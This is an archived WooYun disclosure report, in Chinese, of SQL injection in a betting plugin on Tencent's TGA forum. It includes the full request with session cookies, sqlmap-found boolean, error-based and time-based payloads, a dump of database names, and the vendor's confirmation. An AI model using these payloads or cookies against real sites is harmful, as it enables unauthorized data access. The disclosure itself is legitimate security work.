乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-12-06: 细节已通知厂商并且等待厂商处理中 2013-12-06: 厂商已经确认,细节仅向厂商公开 2013-12-16: 细节向核心白帽子及相关领域专家公开 2013-12-26: 细节向普通白帽子公开 2014-01-05: 细节向实习白帽子公开 2014-01-20: 细节向公众公开
腾讯游戏竞技平台TGA某站注入
问题出现在TGA的bbs,http://bbs.tga.plu.cn。论坛有个竞猜插件,存在sql注入。
,加个单引号,报错了,
。直接放入sqlmap跑好了。由于是bbs,要登录cookie
GET /plugin.php?id=tgabet:official&view=bet&gid=324 HTTP/1.1Accept: text/html, application/xhtml+xml, */*Accept-Language: zh-CNUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)Accept-Encoding: gzip, deflateProxy-Connection: Keep-AliveHost: bbs.tga.plu.cnCookie: pgv_si=s3218769920; BAIDU_CLB_REFER=http%3A%2F%2Ftga.qq.com%2F; pgv_info=ssid=s826767176&ssi=s445771245; pgv_pvi=9775746048; p1u_id=be62972e0e3b14f5a5d3c44cb5e293ffe4487a31d3160196cccd62db03a094322f85c175a90bd6e6; PHPSESSID=a024bc65cbbf4b5ff8fc1d5f8b6f1a73; pgv_info=ssid=s826767176&ssi=s445771245; Hm_lpvt_1cbb74d806aabe66aa1929ede5b12aa1=1386245195; CNZZDATA2171795=cnzz_eid%3D1211801768-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063392%26rtime%3D2; CNZZDATA4990323=cnzz_eid%3D836961960-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063462%26rtime%3D2; CNZZDATA5261713=cnzz_eid%3D925025665-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063488%26rtime%3D2; CNZZDATA5405344=cnzz_eid%3D212189416-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D2%26sin%3Dhttp%253A%252F%252Fbbs.tga.plu.cn%252Fplugin.php%253Fid%253Dtgabet%253Aofficial%2526view%253Dbet%2526gid%253D324%26ltime%3D1386238063513%26rtime%3D2; ts_refer=bbs.tga.plu.cn/plugin.php; pgv_pvid=668465096; ts_uid=5735968957; Hm_lvt_1cbb74d806aabe66aa1929ede5b12aa1=1386171235,1386171240,1386238064,1386244548; ts_last=tga.plu.cn/; CNZZDATA2171795=cnzz_eid%3D1211801768-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D3%26ltime%3D1386238063392%26rtime%3D2; CNZZDATA4990323=cnzz_eid%3D836961960-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D3%26ltime%3D1386238063462%26rtime%3D2; CNZZDATA5111507=cnzz_eid%3D1620167765-1386244570-http%253A%252F%252Fbbs.tga.plu.cn%26ntime%3D1386244570%26cnzz_a%3D19%26ltime%3D1386244570624; CNZZDATA5261713=cnzz_eid%3D925025665-1386089767-http%253A%252F%252Ftga.plu.cn%26ntime%3D1386244548%26cnzz_a%3D3%26ltime%3D1386238063488%26rtime%3D2; tjpctrl=1386246377664; y0XB_f66b_saltkey=T9ZjZj62; y0XB_f66b_lastvisit=1386241603; y0XB_f66b_sid=kOONqn; y0XB_f66b_lastact=1386246274%09forum.php%09; y0XB_f66b_ulastactivity=51dfDecyxFVPI0ZsLPihV05CRfMueMfuoAl3iMeyA0D4wk1J2LMI; y0XB_f66b_auth=573aACXrH%2BOm2%2BX2xu%2FQ8WvKvA%2F7zooCXa4gcakMqlCbOd4STI8UM%2FVtEPGp8Teo9bcIV%2Bp5G9KeHkAPamtmyxF2fqIN; y0XB_f66b_lastcheckfeed=2232996%7C1386245396; y0XB_f66b_security_cookiereport=ae31aahIldqhRDHjjWZ%2BvvrFt%2FjcsXg8E6fa4rzFCj2IpTPWbz3Q; y0XB_f66b_nofavfid=1; y0XB_f66b_onlineusernum=528; y0XB_f66b_sendmail=1
,然后-r cookie.txt就能跑出数据。
Place: GETParameter: gid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=tgabet:official&view=bet&gid=324 AND 2667=2667 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=tgabet:official&view=bet&gid=324 AND (SELECT 7558 FROM(SELECT COUNT(*),CONCAT(0x3a7876763a,(SELECT (CASE WHEN (7558=7558) THEN 1 ELSE 0 END)),0x3a6b61733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=tgabet:official&view=bet&gid=324 AND SLEEP(5)---sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: gid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=tgabet:official&view=bet&gid=324 AND 2667=2667 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=tgabet:official&view=bet&gid=324 AND (SELECT 7558 FROM(SELECT COUNT(*),CONCAT(0x3a7876763a,(SELECT (CASE WHEN (7558=7558) THEN 1 ELSE 0 END)),0x3a6b61733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=tgabet:official&view=bet&gid=324 AND SLEEP(5)---available databases [9]:[*] AdCount[*] AppStore[*] information_schema[*] mysql[*] performance_schema[*] PLU_Bak[*] PLU_Jobs[*] PLUHome[*] ucbbs
,权限还不小
不知道能不能写shell,反正sqlmap不行。感觉tga是外包给plu做的。
插件处
危害等级:低
漏洞Rank:5
确认时间:2013-12-06 17:12
非常感谢您的报告,经过确认此问题为腾讯合作伙伴的业务,我们已经通知相关单位,问题已着手处理。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。
暂无